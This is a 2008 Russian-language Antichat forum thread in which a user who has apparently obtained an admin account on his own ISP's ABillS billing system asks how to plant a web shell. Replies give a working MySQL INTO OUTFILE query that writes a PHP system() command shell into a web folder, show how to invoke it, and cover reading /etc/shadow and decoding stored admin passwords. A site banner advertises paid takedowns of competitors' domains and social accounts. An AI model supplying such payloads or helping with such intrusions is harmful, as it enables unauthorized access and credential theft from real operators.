Форум АНТИЧАТ - нужна помощь(abbills)

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
нужна помощь(abbills)

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

нужна помощь(abbills)

31.05.2008, 00:46

samarin

Участник форума

Регистрация: 24.02.2008

Сообщений: 136

Провел на форуме:
295283

Репутация: 69

Отправить сообщение для samarin с помощью ICQ

нужна помощь(abbills)

Может для когото вопросы покажутся и "детскими", но все-же:
Нарыл акк админа, очень бы хотелось залить шелл.В системе присутствует sql commander. Но или я тупой

или коммандер какой-то не такой

(скорее всего первое

)
сайт разработчкика
Делаю запрос например на вывод других админов в системе

Код:

select user,password from admins

в ответ выплевывает

Цитата:

admin Чвl?ЄDЅ%КrJKЛ

Как вывести на нормальном языке?
Проблема прядли с кодировками, т.к информация (имена пользователей, включая другую информацию)не считая паролей, выводятся в читабельном виде.
По поводу шела into outfile как и load не получается использовать (выскакивает ошибка error select tables from blabla).
-------------------------------
какие есть варианты?

Последний раз редактировалось samarin; 31.05.2008 в 14:38..

01.06.2008, 12:26

bakl

Новичок

Регистрация: 29.05.2008

Сообщений: 12

Провел на форуме:
134986

Репутация: 13

Цитата:

Сообщение от samarin

admin Чвl?ЄDЅ%КrJKЛ

ну с этим возни больше будет, а вот что с шеллом не получается? напиши конкретно какой запрос делаешь и какую ошибку выкидывает, ну вообщем поподробнее опиши свои действия.

01.06.2008, 18:37

samarin

Участник форума

Регистрация: 24.02.2008

Сообщений: 136

Провел на форуме:
295283

Репутация: 69

система работает на базе ".cgi"
user:abills@localhost
database:abills
version:5.0.51a-log
information_schema выводит
----------------------------------------
SELECT load_file('/etc/hosts') результат Ok
Но вывода файла нет =(
select load_file('/etc/shadow') ok
на права не ругается, значит доступ есть, но опять таки вывода файла нет.
---------------------------------------
Дальше колупать(не зная) стремно, как никак мой пров ))
---------------------------------------
Может кто подскажет как быть с выводом? или может с заливкой шелла?

01.06.2008, 19:11

bakl

Новичок

Регистрация: 29.05.2008

Сообщений: 12

Провел на форуме:
134986

Репутация: 13

так что те мешает найти папку для записи и потом выполнить запрос
select '<?php system($_GET["cmd"]); ?>' from mysql.user into outfile 'C:\www...ну вообщем путь до папки для записи (например С\www\tmp\) \ shell.php'

ну и потом просто http:\\путь до файла\shell.php?cmd=команда(напри мер dir)

p.s. исправил вчера забыл дописать from xd

Последний раз редактировалось bakl; 02.06.2008 в 10:16..

02.06.2008, 14:20

mr.celt

Участник форума

Регистрация: 06.02.2008

Сообщений: 110

Провел на форуме:
217423

Репутация: 32

Цитата:

Сообщение от samarin

похожая проблема с выводом паролей

__https://forum.antichat.ru/thread71538.html

02.06.2008, 15:44

mister

Познающий

Регистрация: 24.07.2007

Сообщений: 31

Провел на форуме:
1417840

Репутация: 35

Отправить сообщение для mister с помощью ICQ

может хеш такой?

02.06.2008, 17:45

mr.celt

Участник форума

Регистрация: 06.02.2008

Сообщений: 110

Провел на форуме:
217423

Репутация: 32

попробуй вот так
select user,cast(password as binary) from admins

06.06.2008, 13:48

samarin

Участник форума

Регистрация: 24.02.2008

Сообщений: 136

Провел на форуме:
295283

Репутация: 69

Цитата:

мешает по идее фильтр. Даже при кодировке 0х+hex вылазит одна и таже ошибка

[3] ERROR_SQL /select `
или [3] ERROR_SQL/select (сам запрос)

07.06.2008, 14:06

mr.celt

Участник форума

Регистрация: 06.02.2008

Сообщений: 110

Провел на форуме:
217423

Репутация: 32

Цитата:

Сообщение от samarin

Я с этим sql commanderом не встречался, но ситуация была похожая. Когда ты делаешь select '<?php system($_GET["cmd"]); ?>' from mysql.user into outfile 'C:\www... , уверен, что количество столбцов в первом и втором selecte совпадает?

Пробовал вот так
select 1,2,'<?php system($_GET["cmd"]); ?>',4 from mysql.user into outfile 'C:\www... ?

#10

22.06.2008, 16:09

samarin

Участник форума

Регистрация: 24.02.2008

Сообщений: 136

Провел на форуме:
295283

Репутация: 69

Все кто отвечал так и не смотрели исходники

. Сам вот добрался немного посмотрел(хоть сильно в этом и не разбираюсь)
так вот пароли выводятся криво из за функции encode

Цитата:

INSERT INTO admins (id, name, regdate, password, gid, aid, disable, phone, web_options) VALUES ('abills','abills','2005-06-16', ENCODE('abills', 'test12345678901234567890'), 0, 1,0,'', '');

как составить запрос для правильного вывода? Как я понял нужно использовать decode. А по поводу встроенного в систему sql commander-a может кто-то все таки не поленится и попробует систему в действии чтобы дать дельный совет по поводу шелла? буду признателен

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Нужна галерея для сайта	Cawabunga	PHP, PERL, MySQL, JavaScript	16	31.05.2008 19:47
Нужна помощь	diznt	Болталка	10	30.03.2008 23:23
Нужна помочь с curl'ом...	Linuxoid	PHP, PERL, MySQL, JavaScript	2	21.01.2008 08:45

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход